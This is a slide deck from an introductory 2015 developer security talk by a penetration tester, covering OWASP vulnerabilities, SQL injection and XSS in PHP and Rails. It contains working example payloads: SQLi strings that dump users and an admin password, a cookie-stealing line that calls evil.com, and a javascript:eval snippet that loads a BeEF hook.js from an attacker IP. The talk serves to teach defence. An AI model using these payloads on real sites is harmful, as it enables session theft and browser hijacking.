Embed Size (px)
Citation preview
Don’t Do what Derpy The Dreadful Dev Does
(also - don’t let “friends” on IRC decide on your talk title)
Secure Development Melbourne, 11/06/2015
whoami
• @liamosaur
• Penetration Tester / Consultant with Assurance
• Previously: C# / Java developer
The Brief• Basic, Introductory Level talk
about security
• Establish some common ground between the Infosec and Dev world
Topics
• Popular vulnerabilities (hopefully a recap)
• Demo some tools by exploiting some vulns
OWASP Top 5/10
1. Injection (SQLi, Command injection, XXE, LDAPi etc)
2. Broken Auth / Session Management
3. Cross-Site Scripting (XSS)
4. Insecure Direct Object References
5. Security Misconfiguration
SQLi basics
• Inject user controlled content into dynamic SQL queries, allowing unintended access/control of database
SQLi basics• PHP: $query = "SELECT username FROM users WHERE username=‘".$_POST['username']."'";
• Input: liamo
• SQL: SELECT username FROM users WHERE username=‘liamo’
• Query result: liamo
SQLi basics• PHP: $query = "SELECT username FROM users WHERE username=‘".$_POST['username']."'";
• Input: ' OR 'a'='a
• SQL: SELECT username FROM users WHERE username=‘' OR ‘a'='a’
• Query result: list of all users
SQLi basics• PHP: $query = "SELECT username FROM users WHERE username=‘".$_POST['username']."'";
• Input: liamo' UNION SELECT password FROM users WHERE username='admin
• SQL: SELECT username FROM users WHERE username=‘liamo' UNION SELECT password FROM users WHERE username='admin’
• Query result: liamo and the admin password
Cross-Site Scripting (XSS)
• Inject user controlled content into dynamic web content, allowing unintended access/control within a target browser
XSS Basics• HTML: <html><body>Hello, <?php echo $_REQUEST ['name']; ?>!</body></html>
• Input: Liam
• Output: Hello, Liam!
XSS Basics• HTML: <html><body>Hello, <?php echo $_REQUEST ['name']; ?>!</body></html>
• Input: Liam<script>alert(1)</script>
• Output:
XSS - Who cares?• Old school - cookie stealing • http://evil.com/cookies.php?
+escape(document.cookie)
• Steal session ID - game over
• Less effective thanks to httpOnly cookie flag
“Nobody uses PHP anymore Liam, all the cool kids use Ruby on Rails
now”
PHP Demo!
Rails
• Problem #1 - I don’t know Rails
• Solution: Learn Rails! (this is definitely a worthwhile proposition for a “10-20 minute talk”)
Rails• Learned Rails. Wrote a basic app
• Problem #2: Rails has ActiveRecord magic beans that prevent SQLi
Rails
• Solution: Uhh.. maybe I’ll just demo XSS instead!
Rails• Problem #3: Rails has input/
output escaping magic beans that prevent XSS
• Solution: Declare webapp security solved, retire from pentesting, write Rails app, move to SF, get VC, found startup, sell to Google/Apple, make fat stacks, retire
Rubby Demo!
Presenting: Rubby
Presenting: Rubby• Bad code
• Better code
Exploiting Rubby
Rubby XSS
• “link_to” is vulnerable to XSS out of the box if it displays user controlled content
Rubby XSS• Challenge for those playing at home:
some up with a shorter, more elegant way of injecting a link to hook.js into a Rails link_to than this monstrosity: javascript:eval("function x(){var a = document.createElement('script');a.setAttribute('src','http://192.168.57.159:3000/hook.js');document.head.appendChild(a);};x();");
BeEF Tunnelling ProxyBeEF SERVER
(http proxy)
Phish with XSS hook.js
Attackers Browser
Victims Browser
(XHR proxy)
Target server (same domain as
XSS phish)
Frameworks/Languages• PHP
• Bad: No built in security
• Ruby on Rails
• Good: Built in security
Frameworks/Languages• PHP
• Good: PHP devs know they need to take security into account
• Ruby on Rails
• Bad: “The framework takes care of security for me!”
Conclusions• Security is everyone’s
responsibility
• Your frameworks magic beans won’t save you
Questions - save for the Q&A Panel!
References• https://www.owasp.org/index.php/
Top_10_2013-Top_10
• http://rails-sqli.org/
• https://www.owasp.org/index.php/Ruby_on_Rails_Cheatsheet
• https://github.com/beefproject/beef/wiki/Tunneling
• http://sqlmap.org/
